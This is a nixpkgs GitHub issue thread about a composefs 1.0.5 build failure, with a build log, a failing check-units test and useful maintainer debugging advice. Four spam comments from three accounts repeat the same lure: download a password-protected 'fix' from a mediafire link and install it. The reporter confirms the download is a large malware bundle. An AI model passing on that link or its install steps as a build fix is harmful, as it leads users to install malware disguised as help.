### ISSUE TITLE
Build failure: composefs 1.0.5

### ISSUE THREAD

**Issue by oluceps** [NixOS/nixpkgs#337517]
### Steps To Reproduce

1. build *X*

### Build log

```
warning: The interpretation of store paths arguments ending in `.drv` recently changed. If this command is now failing try again with '/nix/store/n3wnvdnnqmgq3skfzghz74m7z6srbp8v-composefs-1.0.5.drv^*'
Running phase: unpackPhase
@nix { "action": "setPhase", "phase": "unpackPhase" }
unpacking source archive /nix/store/m46j43w0xmh3cnkknp94acdnwqvn1gcx-source
source root is source
Running phase: patchPhase
@nix { "action": "setPhase", "phase": "patchPhase" }
Running phase: updateAutotoolsGnuConfigScriptsPhase
@nix { "action": "setPhase", "phase": "updateAutotoolsGnuConfigScriptsPhase" }
Running phase: configurePhase
@nix { "action": "setPhase", "phase": "configurePhase" }
mesonConfigurePhase flags: --prefix=/nix/store/3pl3219q2rjhw1yyn5gnvgpbbzdi39mx-composefs-1.0.5 --libdir=>
The Meson build system
Version: 1.5.1
Source dir: /build/source
Build dir: /build/source/build
Build type: native build
Project name: composefs
Project version: 1.0.5
C compiler for the host machine: gcc (gcc 13.3.0 "gcc (GCC) 13.3.0")
C linker for the host machine: gcc ld.bfd 2.42
Host machine cpu family: x86_64
Host machine cpu: x86_64
Compiler for C supports arguments -Werror=shadow: YES 
Compiler for C supports arguments -Werror=empty-body: YES 
Compiler for C supports arguments -Werror=strict-prototypes: YES 
Compiler for C supports arguments -Werror=missing-prototypes: YES 
Compiler for C supports arguments -Werror=implicit-function-declaration: YES 
Compiler for C supports arguments -Werror=format=2 -Werror=format-security -Werror=format-nonliteral: NO 
...skipping...
>>> MSAN_OPTIONS=halt_on_error=1:abort_on_error=1:print_summary=1:print_stacktrace=1 MESON_TEST_ITERATION>
 ✀  
stdout:
Test options: can_whiteout=y has_fuse=n has_fsck=y has_fsverity=y
Test test_inline: OK
Test test_objects: OK
stderr:
-rw-r--r-- 1 nixbld nixbld 129 Aug 26 17:49 /build/lcfs-test.FJooF6/test_mount_digest.OiYMIU/stderr
# mount.composefs: Failed to mount composefs /build/lcfs-test.FJooF6/test_mount_digest.OiYMIU/test.cfs: N>
# 
File '/build/lcfs-test.FJooF6/test_mount_digest.OiYMIU/stderr' doesn't match regexp 'Permission denied'


[2-3/3] 🌒 check-random-fuse                  0/300s^M[2-3/3] 🌓 check-checksums                    0/ 30>
[3/3] 🌘 check-random-fuse                    5/300s^M[3/3] 🌑 check-random-fuse                    5/300>

Summary of Failures:

1/3 check-units       FAIL             0.08s   exit status 1

Ok:                 2   
Expected Fail:      0   
Fail:               1   
Unexpected Pass:    0   
Skipped:            0   
Timeout:            0   
```

### Notify maintainers
@Kiskae 

### Metadata

Please run `nix-shell -p nix-info --run "nix-info -m"` and paste the result.

```console
nixos unstable small
```

---

Add a :+1: [reaction] to [issues you find important].

[reaction]: https://github.blog/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/
[issues you find important]: https://github.com/NixOS/nixpkgs/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by oluceps** [comment]
Awesome. Now I have malware with 200M+ size and a libcef within.

**Comment by Kiskae** [comment]
@oluceps 

> Test options: can_whiteout=y has_fuse=n has_fsck=y has_fsverity=y

Interesting you actually have a fsverity-enabled build directory, so this is probably an upstream issue that nobody has run into while running the tests.

Specifically it looks like this line is detecting something is not behaving as it should:
https://github.com/containers/composefs/blob/0e7fa4804340230644673e51afde68d18b4bf62c/tests/test-units.sh#L66

I recommended that you open this issue upstream. You can temporarily fix the build locally by overriding the package and setting `doCheck` to `false`.

**Comment by Kiskae** [comment]
Also, could you post the rest of the line starting with `# mount.composefs`. It is getting cut off by your pager and seems to contain the actual error from the mount attempt.
